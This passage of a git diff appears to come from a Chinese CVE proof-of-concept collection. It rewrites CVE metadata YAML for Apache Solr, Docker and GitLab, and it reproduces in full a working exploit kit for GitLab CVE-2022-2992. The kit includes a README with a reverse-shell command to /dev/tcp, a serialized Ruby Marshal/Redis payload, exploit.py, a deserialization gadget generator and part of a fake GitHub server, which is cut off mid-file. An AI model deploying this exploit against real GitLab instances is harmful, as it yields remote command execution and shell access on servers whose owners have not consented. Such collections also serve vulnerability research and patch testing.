-    - https://lists.apache.org/thread.html/a6e3c09dba52b86d3a1273f82425973e1b0623c415d0e4f121d89eab@%3Cissues.lucene.apache.org%3E	
-    - https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E	
-    - https://lists.apache.org/thread.html/e85f735fad06a0fb46e74b7e6e9ce7ded20b59637cd9f993310f814d@%3Cissues.lucene.apache.org%3E	
-    - https://lists.apache.org/thread.html/r140128dc6bb4f4e0b6a39e962c7ca25a8cbc8e48ed766176c931fccc@%3Cusers.solr.apache.org%3E	
-    - https://lists.apache.org/thread.html/r19d23e8640236a3058b4d6c23e5cd663fde182255f5a9d63e0606a66@%3Cdev.lucene.apache.org%3E	
-    - https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E	
-    - https://lists.apache.org/thread.html/r339865b276614661770c909be1dd7e862232e3ef0af98bfd85686b51@%3Cdev.lucene.apache.org%3E	
-    - https://lists.apache.org/thread.html/r33aed7ad4ee9833c4190a44e2b106efd2deb19504b85e012175540f6@%3Cissues.lucene.apache.org%3E	
-    - https://lists.apache.org/thread.html/r3da74965aba2b5f5744b7289ad447306eeb2940c872801819faa9314@%3Cusers.solr.apache.org%3E	
-    - https://lists.apache.org/thread.html/r95df34bb158375948da82b4dfe9a1b5d528572d586584162f8f5aeef@%3Cusers.solr.apache.org%3E	
-    - https://lists.apache.org/thread.html/rb34d820c21f1708c351f9035d6bc7daf80bfb6ef99b34f7af1d2f699@%3Cissues.lucene.apache.org%3E	
-    - https://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8@%3Ccommits.submarine.apache.org%3E	
-    - https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E	
-    - https://lists.debian.org/debian-lts-announce/2019/10/msg00013.html	
-    - https://lists.debian.org/debian-lts-announce/2020/08/msg00025.html
-  classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 7.2
-    cve-id: CVE-2019-0193
-    cwe-id: CWE-94
-    cnvd-id: None
-    kve-id: None
-  tags: 对生成代码的控制不恰当, 代码注入
+id: CVE-2019-0193
+source: https://github.com/jas502n/CVE-2019-0193
+info:
+  name: Apache Solr是美国阿帕奇（Apache）基金会的一款基于Lucene（一款全文搜索引擎）的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。
+  severity: high
+  description:
+    在Apache Solr中，DataImportHandler是一个可选但常用的模块，用于从数据库和其他源中提取数据，它具有一个功能，其中整个DIH配置可以来自请求的“dataConfig”参数。 DIH管理界面的调试模式使用它来方便调试/开发DIH配置。由于DIH配置可以包含脚本，因此该参数存在安全风险。从Solr的8.2.0版开始，使用此参数需要将Java System属性“enable.dih.dataConfigParam”设置为true。
+  scope-of-influence:
+    Apache Solr < 8.2.0
+  reference:
+    - https://issues.apache.org/jira/browse/SOLR-13669
+    - https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/42cc4d334ba33905b872a0aa00d6a481391951c8b1450f01b077ce74@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/55880d48e38ba9e8c41a3b9e41051dbfdef63b86b0cfeb32967edf03@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/6f2d61bd8732224c5fd3bdd84798f8e01e4542d3ee2f527a52a81b83@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/7143983363f0ba463475be4a8b775077070a08dbf075449b7beb51ee@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/9b0e7a7e3e18d0724f511403b364fc082ff56e3134d84cfece1c82fc@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/a6e3c09dba52b86d3a1273f82425973e1b0623c415d0e4f121d89eab@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E	
+    - https://lists.apache.org/thread.html/e85f735fad06a0fb46e74b7e6e9ce7ded20b59637cd9f993310f814d@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/r140128dc6bb4f4e0b6a39e962c7ca25a8cbc8e48ed766176c931fccc@%3Cusers.solr.apache.org%3E	
+    - https://lists.apache.org/thread.html/r19d23e8640236a3058b4d6c23e5cd663fde182255f5a9d63e0606a66@%3Cdev.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E	
+    - https://lists.apache.org/thread.html/r339865b276614661770c909be1dd7e862232e3ef0af98bfd85686b51@%3Cdev.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/r33aed7ad4ee9833c4190a44e2b106efd2deb19504b85e012175540f6@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/r3da74965aba2b5f5744b7289ad447306eeb2940c872801819faa9314@%3Cusers.solr.apache.org%3E	
+    - https://lists.apache.org/thread.html/r95df34bb158375948da82b4dfe9a1b5d528572d586584162f8f5aeef@%3Cusers.solr.apache.org%3E	
+    - https://lists.apache.org/thread.html/rb34d820c21f1708c351f9035d6bc7daf80bfb6ef99b34f7af1d2f699@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8@%3Ccommits.submarine.apache.org%3E	
+    - https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E	
+    - https://lists.debian.org/debian-lts-announce/2019/10/msg00013.html	
+    - https://lists.debian.org/debian-lts-announce/2020/08/msg00025.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2019-0193
+    cwe-id: CWE-94
+    cnvd-id: None
+    kve-id: None
+  tags: 对生成代码的控制不恰当, 代码注入
diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/.gitignore b/cve/apache-tomcat/2020/CVE-2020-13935/.gitignore
old mode 100755
new mode 100644
diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/LICENSE b/cve/apache-tomcat/2020/CVE-2020-13935/LICENSE
old mode 100755
new mode 100644
diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/README.md b/cve/apache-tomcat/2020/CVE-2020-13935/README.md
old mode 100755
new mode 100644
diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/go.mod b/cve/apache-tomcat/2020/CVE-2020-13935/go.mod
old mode 100755
new mode 100644
diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/go.sum b/cve/apache-tomcat/2020/CVE-2020-13935/go.sum
old mode 100755
new mode 100644
diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/main.go b/cve/apache-tomcat/2020/CVE-2020-13935/main.go
old mode 100755
new mode 100644
diff --git a/cve/apache-tomcat/2022/CVE-2022-29885/CVE-2022-29885.go b/cve/apache-tomcat/2022/CVE-2022-29885/CVE-2022-29885.go
old mode 100755
new mode 100644
diff --git a/cve/apache-tomcat/2022/CVE-2022-29885/README.md b/cve/apache-tomcat/2022/CVE-2022-29885/README.md
old mode 100755
new mode 100644
diff --git a/cve/docker/2023/yaml/CVE-2022-37708.yaml b/cve/docker/2023/yaml/CVE-2022-37708.yaml
index 85eb7605..e1b6e56d 100644
--- a/cve/docker/2023/yaml/CVE-2022-37708.yaml
+++ b/cve/docker/2023/yaml/CVE-2022-37708.yaml
@@ -1,23 +1,23 @@
-id: CVE-2022-37708
-source: 
-  https://github.com/thekevinday/docker_lightman_exploit
-info:
-  name: Docker是美国Docker公司的一款开源的应用容器引擎。该产品支持在Linux系统上创建一个容器（轻量级虚拟机）并部署和运行应用程序，以及通过配置文件实现应用程序的自动化安装、部署和升级。
-  severity: medium
-  description: |
-    Docker版本20.10.15（build fd82621）易受不安全权限的攻击。Docker容器外的未授权用户可以访问Docker容器内的任何文件。
-  scope-of-influence:
-    Docker 20.10.15, build fd82621
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-37708
-    - https://www.docker.com/
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37708
-    - https://github.com/orgs/docker/repositories
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
-    cvss-score: 6.8
-    cve-id: CVE-2022-37708
-    cwe-id: CWE-732
-    cnvd-id: None
-    kve-id: None
+id: CVE-2022-37708
+source: 
+  https://github.com/thekevinday/docker_lightman_exploit
+info:
+  name: Docker是美国Docker公司的一款开源的应用容器引擎。该产品支持在Linux系统上创建一个容器（轻量级虚拟机）并部署和运行应用程序，以及通过配置文件实现应用程序的自动化安装、部署和升级。
+  severity: medium
+  description: |
+    Docker版本20.10.15（build fd82621）易受不安全权限的攻击。Docker容器外的未授权用户可以访问Docker容器内的任何文件。
+  scope-of-influence:
+    Docker 20.10.15, build fd82621
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-37708
+    - https://www.docker.com/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37708
+    - https://github.com/orgs/docker/repositories
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 6.8
+    cve-id: CVE-2022-37708
+    cwe-id: CWE-732
+    cnvd-id: None
+    kve-id: None
   tags: 未授权访问
\ No newline at end of file
diff --git a/cve/gitlab/2020/yaml/CVE-2020-10977.yaml b/cve/gitlab/2020/yaml/CVE-2020-10977.yaml
index 11c4e937..588a5e37 100644
--- a/cve/gitlab/2020/yaml/CVE-2020-10977.yaml
+++ b/cve/gitlab/2020/yaml/CVE-2020-10977.yaml
@@ -1,20 +1,20 @@
-id: CVE-2020-10977
-source: https://github.com/thewhiteh4t/cve-2020-10977
-info:
-  name: GitLab是由GitLab Inc.开发，一款基于Git的完全集成的软件开发平台。
-  severity: MEDIUM
-  description: |
-    GitLab EE/CE 8.5 到 12.9 在项目之间移动问题时容易受到路径遍历的影响。
-  scope-of-influence:
-    8.5.0 <= GitLab（CE/EE）< 12.9
-    8.5.0 <= GitLab（CE/EE）< 12.9
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-10977
-  classification:
-    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 5.5
-    cve-id: CVE-2020-10977
-    cwe-id: CWE-22
-    cnvd-id: None
-    kve-id: None
+id: CVE-2020-10977
+source: https://github.com/thewhiteh4t/cve-2020-10977
+info:
+  name: GitLab是由GitLab Inc.开发，一款基于Git的完全集成的软件开发平台。
+  severity: MEDIUM
+  description: |
+    GitLab EE/CE 8.5 到 12.9 在项目之间移动问题时容易受到路径遍历的影响。
+  scope-of-influence:
+    8.5.0 <= GitLab（CE/EE）< 12.9
+    8.5.0 <= GitLab（CE/EE）< 12.9
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-10977
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 5.5
+    cve-id: CVE-2020-10977
+    cwe-id: CWE-22
+    cnvd-id: None
+    kve-id: None
   tags: EE/CE, cve2020, gitlab
\ No newline at end of file
diff --git a/cve/gitlab/2022/CVE-2022-2992/README.md b/cve/gitlab/2022/CVE-2022-2992/README.md
index 59776cd6..282e156f 100644
--- a/cve/gitlab/2022/CVE-2022-2992/README.md
+++ b/cve/gitlab/2022/CVE-2022-2992/README.md
@@ -1,97 +1,97 @@
-# CVE-2022-2992
-Authenticated Remote Command Execution in Gitlab via GitHub import.
-> A vulnerability in GitLab CE/EE affecting all versions from 11.10 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint.
-
-https://about.gitlab.com/releases/2022/08/30/critical-security-release-gitlab-15-3-2-released/#remote-command-execution-via-github-import 
-
-## Prerequisites
-- [Ngrok](https://ngrok.com/)
-- Ruby
-- Redis
-- Python3
-- Flask
-```
-sudo apt install ruby python3 python3-pip
-gem install redis 
-pip install flask
-```
----
-## Steps
-1) Run `./ngrok http 5000` and save the URL.
-2) Now to generate the serialized payload run [payload_gen.rb](https://github.com/CsEnox/CVE-2022-2992/blob/main/payload_gen.rb) and save the payload. Below is an example:
-```bash
-ruby payload_gen.rb 'bash -c "sh -i >& /dev/tcp/172.16.128.129/443 0>&1"'
-```
-3) In [server.py](https://github.com/CsEnox/CVE-2022-2992/blob/main/server.py) update NGROK_URL and PAYLOAD variables accordingly. Below is an example:
-```py
-PAYLOAD = 'ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$359\r\n\u0004\b[\bc\u0015Gem::SpecFetcherc\u0013Gem::InstallerU:\u0015Gem::Requirement[\u0006o:\u001cGem::Package::TarReader\u0006:\b@ioo:\u0014Net::BufferedIO\u0007;\u0007o:#Gem::Package::TarReader::Entry\u0007:\n@readi\u0000:\f@headerI\"\baaa\u0006:\u0006ET:\u0012@debug_outputo:\u0016Net::WriteAdapter\u0007:\f@socketo:\u0014Gem::RequestSet\u0007:\n@setso;\u000e\u0007;\u000fm\u000bKernel:\u000f@method_id:\u000bsystem:\r@git_setI\"8bash -c \"sh -i >& /dev/tcp/172.16.128.129/443 0>&1\"\u0006;\fT;\u0012:\fresolve'
-NGROK_URL = 'https://dc09-41-01-99-69.in.ngrok.io'
-```
-4) Create an access token for the user on gitlab and select all scopes. Please read the documentation [here](https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html)
-5) Finally firing off our [exploit.py](https://github.com/CsEnox/CVE-2022-2992/blob/main/exploit.py).
-
-**NOTE**: Before running make sure ngrok and flask server are running.
-```py
-python3 exploit.py -a lunpy-AMEuQE66KcUtNhcharjm5 -u https://dc09-41-01-99-69.in.ngrok.io -t http://gitlab.example
-```
-- We get a shell back on port 443
-```bash
-➜ CVE-2022-2992: nc -nlvp 443
-listening on [any] 443 ...
-connect to [172.16.128.129] from (UNKNOWN) [172.16.128.180] 40270
-sh: 0: can't access tty; job control turned off
-$ id
-uid=998(git) gid=998(git) groups=998(git)
-```
-
----
-### Expected output in each window:
-- Ngrok
-```http
-POST /vakzz/public.git/git-upload-pack 200 OK
-GET  /vakzz/public.git/info/refs       200 OK
-GET  /api/v3/repos/fake/name           200 OK
-GET  /api/v3/repositories/12345        200 OK
-GET  /api/v3/rate_limit                200 OK
-GET  /api/v3/rate_limit                200 OK
-```
-- Exploit
-```py
-[1] Creating Group
-[+] Successfully created group: qogjohpykk
-[2] Running flask server
-[3] Importing Github Repo
- * Serving Flask app "server" (lazy loading)
- * Environment: production
-   WARNING: This is a development server. Do not use it in a production deployment.
-   Use a production WSGI server instead.
- * Debug mode: off
- * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
-127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 -
-127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 -
-127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/repositories/12345 HTTP/1.1" 200 -
-201
-127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /vakzz/public.git/info/refs?service=git-upload-pack HTTP/1.1" 200 -
-127.0.0.1 - - [08/Oct/2022 23:46:04] "POST /vakzz/public.git/git-upload-pack HTTP/1.1" 200 -
-127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /api/v3/repos/fake/name HTTP/1.1" 200 -
-[4] Triggering Payload
-[+] Command was executed
-```
----
-
-## Environment
-- Tested on Gitlab 15.3.1 Enterprise Edition
-- For building your own environment for testing, copy the [data](https://github.com/CsEnox/CVE-2022-2992/tree/main/data) directory to `/` on your Linux VM.
-- Run build.sh to setup the environment. Once the script finishes executing you can login using the following credentials on gitlab.
-```
-Username: enox
-Email: enox@gitlab.example
-Password: StrongestGitlabPassword
-```
----
-
-## Credits
-- https://hackerone.com/reports/1679624 (vakzz)
-- https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html
-
-If you have any questions reach out to me on [Discord](https://discord.com/) (Enox#4458)
+# CVE-2022-2992
+Authenticated Remote Command Execution in Gitlab via GitHub import.
+> A vulnerability in GitLab CE/EE affecting all versions from 11.10 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint.
+
+https://about.gitlab.com/releases/2022/08/30/critical-security-release-gitlab-15-3-2-released/#remote-command-execution-via-github-import 
+
+## Prerequisites
+- [Ngrok](https://ngrok.com/)
+- Ruby
+- Redis
+- Python3
+- Flask
+```
+sudo apt install ruby python3 python3-pip
+gem install redis 
+pip install flask
+```
+---
+## Steps
+1) Run `./ngrok http 5000` and save the URL.
+2) Now to generate the serialized payload run [payload_gen.rb](https://github.com/CsEnox/CVE-2022-2992/blob/main/payload_gen.rb) and save the payload. Below is an example:
+```bash
+ruby payload_gen.rb 'bash -c "sh -i >& /dev/tcp/172.16.128.129/443 0>&1"'
+```
+3) In [server.py](https://github.com/CsEnox/CVE-2022-2992/blob/main/server.py) update NGROK_URL and PAYLOAD variables accordingly. Below is an example:
+```py
+PAYLOAD = 'ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$359\r\n\u0004\b[\bc\u0015Gem::SpecFetcherc\u0013Gem::InstallerU:\u0015Gem::Requirement[\u0006o:\u001cGem::Package::TarReader\u0006:\b@ioo:\u0014Net::BufferedIO\u0007;\u0007o:#Gem::Package::TarReader::Entry\u0007:\n@readi\u0000:\f@headerI\"\baaa\u0006:\u0006ET:\u0012@debug_outputo:\u0016Net::WriteAdapter\u0007:\f@socketo:\u0014Gem::RequestSet\u0007:\n@setso;\u000e\u0007;\u000fm\u000bKernel:\u000f@method_id:\u000bsystem:\r@git_setI\"8bash -c \"sh -i >& /dev/tcp/172.16.128.129/443 0>&1\"\u0006;\fT;\u0012:\fresolve'
+NGROK_URL = 'https://dc09-41-01-99-69.in.ngrok.io'
+```
+4) Create an access token for the user on gitlab and select all scopes. Please read the documentation [here](https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html)
+5) Finally firing off our [exploit.py](https://github.com/CsEnox/CVE-2022-2992/blob/main/exploit.py).
+
+**NOTE**: Before running make sure ngrok and flask server are running.
+```py
+python3 exploit.py -a lunpy-AMEuQE66KcUtNhcharjm5 -u https://dc09-41-01-99-69.in.ngrok.io -t http://gitlab.example
+```
+- We get a shell back on port 443
+```bash
+➜ CVE-2022-2992: nc -nlvp 443
+listening on [any] 443 ...
+connect to [172.16.128.129] from (UNKNOWN) [172.16.128.180] 40270
+sh: 0: can't access tty; job control turned off
+$ id
+uid=998(git) gid=998(git) groups=998(git)
+```
+
+---
+### Expected output in each window:
+- Ngrok
+```http
+POST /vakzz/public.git/git-upload-pack 200 OK
+GET  /vakzz/public.git/info/refs       200 OK
+GET  /api/v3/repos/fake/name           200 OK
+GET  /api/v3/repositories/12345        200 OK
+GET  /api/v3/rate_limit                200 OK
+GET  /api/v3/rate_limit                200 OK
+```
+- Exploit
+```py
+[1] Creating Group
+[+] Successfully created group: qogjohpykk
+[2] Running flask server
+[3] Importing Github Repo
+ * Serving Flask app "server" (lazy loading)
+ * Environment: production
+   WARNING: This is a development server. Do not use it in a production deployment.
+   Use a production WSGI server instead.
+ * Debug mode: off
+ * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
+127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 -
+127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 -
+127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/repositories/12345 HTTP/1.1" 200 -
+201
+127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /vakzz/public.git/info/refs?service=git-upload-pack HTTP/1.1" 200 -
+127.0.0.1 - - [08/Oct/2022 23:46:04] "POST /vakzz/public.git/git-upload-pack HTTP/1.1" 200 -
+127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /api/v3/repos/fake/name HTTP/1.1" 200 -
+[4] Triggering Payload
+[+] Command was executed
+```
+---
+
+## Environment
+- Tested on Gitlab 15.3.1 Enterprise Edition
+- For building your own environment for testing, copy the [data](https://github.com/CsEnox/CVE-2022-2992/tree/main/data) directory to `/` on your Linux VM.
+- Run build.sh to setup the environment. Once the script finishes executing you can login using the following credentials on gitlab.
+```
+Username: enox
+Email: enox@gitlab.example
+Password: StrongestGitlabPassword
+```
+---
+
+## Credits
+- https://hackerone.com/reports/1679624 (vakzz)
+- https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html
+
+If you have any questions reach out to me on [Discord](https://discord.com/) (Enox#4458)
diff --git a/cve/gitlab/2022/CVE-2022-2992/exploit.py b/cve/gitlab/2022/CVE-2022-2992/exploit.py
index 63d30a44..e59f5de0 100644
--- a/cve/gitlab/2022/CVE-2022-2992/exploit.py
+++ b/cve/gitlab/2022/CVE-2022-2992/exploit.py
@@ -1,52 +1,52 @@
-import requests
-import time
-import random
-import string
-import argparse
-import threading
-from server import *
-
-parser = argparse.ArgumentParser(description='CVE-2022-2992 - Gitlab Authenticated RCE via Github Import')
-parser.add_argument('-a', help='Auth-Token', required=True)
-parser.add_argument('-u', help='Attacker Repo URL (Eg: https://ba20-40-33-92-70.in.ngrok.io)', required=True)
-parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True)
-args = parser.parse_args()
-
-auth_token = args.a
-gitlab_url = args.t
-attacker_url = args.u
-
-session = requests.Session()
-
-print("[1] Creating Group")
-group_name =''.join(random.choices(string.ascii_lowercase, k=10))
-headers = {'PRIVATE-TOKEN': auth_token}
-data = {'name':group_name,'path':group_name,'visibility':'public'}
-r = session.post(gitlab_url+"/api/v4/groups", headers=headers, data=data)
-
-if r.status_code != 201:
-	print(r.text)
-	exit("Failed to create group, check your auth token.")
-else:
-	print("[+] Successfully created group: "+group_name)
-
-print("[2] Running flask server")
-def runserver():
-	app.run(host='0.0.0.0', port='5000', debug=False)
-t1 = threading.Thread(target=runserver)
-t1.start()
-
-print("[3] Importing Github Repo")
-data= {'personal_access_token':'fake_token','repo_id':'12345','target_namespace':group_name,'new_name':'gh-import-420','github_hostname':attacker_url}
-r = session.post(gitlab_url+"/api/v4/import/github",headers=headers,data=data)
-print(r.status_code)
-time.sleep(5)
-
-print("[4] Triggering Payload")
-headers = {'Cookie':'_gitlab_session=gggg'}
-r = session.get(gitlab_url+"/"+group_name, headers=headers)
-
-if r.status_code != 500:
-	exit("[-] Exploit failed")
-else:
-	print("[+] Command was executed")
+import requests
+import time
+import random
+import string
+import argparse
+import threading
+from server import *
+
+parser = argparse.ArgumentParser(description='CVE-2022-2992 - Gitlab Authenticated RCE via Github Import')
+parser.add_argument('-a', help='Auth-Token', required=True)
+parser.add_argument('-u', help='Attacker Repo URL (Eg: https://ba20-40-33-92-70.in.ngrok.io)', required=True)
+parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True)
+args = parser.parse_args()
+
+auth_token = args.a
+gitlab_url = args.t
+attacker_url = args.u
+
+session = requests.Session()
+
+print("[1] Creating Group")
+group_name =''.join(random.choices(string.ascii_lowercase, k=10))
+headers = {'PRIVATE-TOKEN': auth_token}
+data = {'name':group_name,'path':group_name,'visibility':'public'}
+r = session.post(gitlab_url+"/api/v4/groups", headers=headers, data=data)
+
+if r.status_code != 201:
+	print(r.text)
+	exit("Failed to create group, check your auth token.")
+else:
+	print("[+] Successfully created group: "+group_name)
+
+print("[2] Running flask server")
+def runserver():
+	app.run(host='0.0.0.0', port='5000', debug=False)
+t1 = threading.Thread(target=runserver)
+t1.start()
+
+print("[3] Importing Github Repo")
+data= {'personal_access_token':'fake_token','repo_id':'12345','target_namespace':group_name,'new_name':'gh-import-420','github_hostname':attacker_url}
+r = session.post(gitlab_url+"/api/v4/import/github",headers=headers,data=data)
+print(r.status_code)
+time.sleep(5)
+
+print("[4] Triggering Payload")
+headers = {'Cookie':'_gitlab_session=gggg'}
+r = session.get(gitlab_url+"/"+group_name, headers=headers)
+
+if r.status_code != 500:
+	exit("[-] Exploit failed")
+else:
+	print("[+] Command was executed")
diff --git a/cve/gitlab/2022/CVE-2022-2992/payload_gen.rb b/cve/gitlab/2022/CVE-2022-2992/payload_gen.rb
index 62ec1228..a29e95a6 100644
--- a/cve/gitlab/2022/CVE-2022-2992/payload_gen.rb
+++ b/cve/gitlab/2022/CVE-2022-2992/payload_gen.rb
@@ -1,49 +1,49 @@
-require 'redis'
-require 'json'
-# NOTE: Made by vakzz I only made some minor changes
-
-
-if ARGV.length < 1
-  puts "[!] Please pass command argument"
-  puts 'Example: ruby payload.rb "whoami > /tmp/test"'
-  exit
-end
-
-# Autoload the required classes
-Gem::SpecFetcher
-Gem::Installer
-
-# prevent the payload from running when we Marshal.dump it
-module Gem
-  class Requirement
-    def marshal_dump
-      [@requirements]
-    end
-  end
-end
-
-wa1 = Net::WriteAdapter.new(Kernel, :system)
-
-rs = Gem::RequestSet.allocate
-rs.instance_variable_set('@sets', wa1)
-rs.instance_variable_set('@git_set', "#{ARGV[0]}")
-
-wa2 = Net::WriteAdapter.new(rs, :resolve)
-
-i = Gem::Package::TarReader::Entry.allocate
-i.instance_variable_set('@read', 0)
-i.instance_variable_set('@header', 'aaa')
-
-n = Net::BufferedIO.allocate
-n.instance_variable_set('@io', i)
-n.instance_variable_set('@debug_output', wa2)
-
-t = Gem::Package::TarReader.allocate
-t.instance_variable_set('@io', n)
-
-r = Gem::Requirement.allocate
-r.instance_variable_set('@requirements', t)
-
-payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
-a = "ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$"+((payload.length).to_s)+"\r\n"+payload
-puts a.to_json
+require 'redis'
+require 'json'
+# NOTE: Made by vakzz I only made some minor changes
+
+
+if ARGV.length < 1
+  puts "[!] Please pass command argument"
+  puts 'Example: ruby payload.rb "whoami > /tmp/test"'
+  exit
+end
+
+# Autoload the required classes
+Gem::SpecFetcher
+Gem::Installer
+
+# prevent the payload from running when we Marshal.dump it
+module Gem
+  class Requirement
+    def marshal_dump
+      [@requirements]
+    end
+  end
+end
+
+wa1 = Net::WriteAdapter.new(Kernel, :system)
+
+rs = Gem::RequestSet.allocate
+rs.instance_variable_set('@sets', wa1)
+rs.instance_variable_set('@git_set', "#{ARGV[0]}")
+
+wa2 = Net::WriteAdapter.new(rs, :resolve)
+
+i = Gem::Package::TarReader::Entry.allocate
+i.instance_variable_set('@read', 0)
+i.instance_variable_set('@header', 'aaa')
+
+n = Net::BufferedIO.allocate
+n.instance_variable_set('@io', i)
+n.instance_variable_set('@debug_output', wa2)
+
+t = Gem::Package::TarReader.allocate
+t.instance_variable_set('@io', n)
+
+r = Gem::Requirement.allocate
+r.instance_variable_set('@requirements', t)
+
+payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
+a = "ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$"+((payload.length).to_s)+"\r\n"+payload
+puts a.to_json
diff --git a/cve/gitlab/2022/CVE-2022-2992/server.py b/cve/gitlab/2022/CVE-2022-2992/server.py
index 7e8db2e5..9e871bf7 100644
--- a/cve/gitlab/2022/CVE-2022-2992/server.py
+++ b/cve/gitlab/2022/CVE-2022-2992/server.py
@@ -1,92 +1,92 @@
-from flask import Flask, request, Response, send_file, jsonify
-import requests
-import json
-# Made by vakzz
-HTTP_METHODS = [
-    "GET",
-    "HEAD",
-    "POST",
-    "PUT",
-    "DELETE",
-    "CONNECT",
-    "OPTIONS",
-    "TRACE",
-    "PATCH",
-]
-app = Flask(__name__)
-
-# NOTE: Update these 2 variables
-PAYLOAD = ''
-NGROK_URL = ''
-
-
-REPO_JSON = {
-    "id": 12345,
-    "name": "fake",
-    "full_name": "fake/name",
-    "clone_url": NGROK_URL + "/vakzz/public.git",
-}
-
-
-@app.route("/vakzz/public.git/info/refs")
-def git_refs():
-    return (
-        b"001e# service=git-upload-pack\n00000154b5e17b851383bcee012364d0df7b67a3c4797b73 HEAD\x00multi_ack thin-pack side-band side-band-64k ofs-delta shallow deepen-since deepen-not deepen-relative no-progress include-tag multi_ack_detailed allow-tip-sha1-in-want allow-reachable-sha1-in-want no-done symref=HEAD:refs/heads/main filter object-format=sha1 agent=git/github-g04ce7e352669\n003db5e17b851383bcee012364d0df7b67a3c4797b73 refs/heads/main\n0000",
-        200,
-        {"Content-Type": "application/x-git-upload-pack-advertisement"},
-    )
-
-
-@app.route("/vakzz/public.git/git-upload-pack", methods=["POST"])
-def git_pack():
-    return (
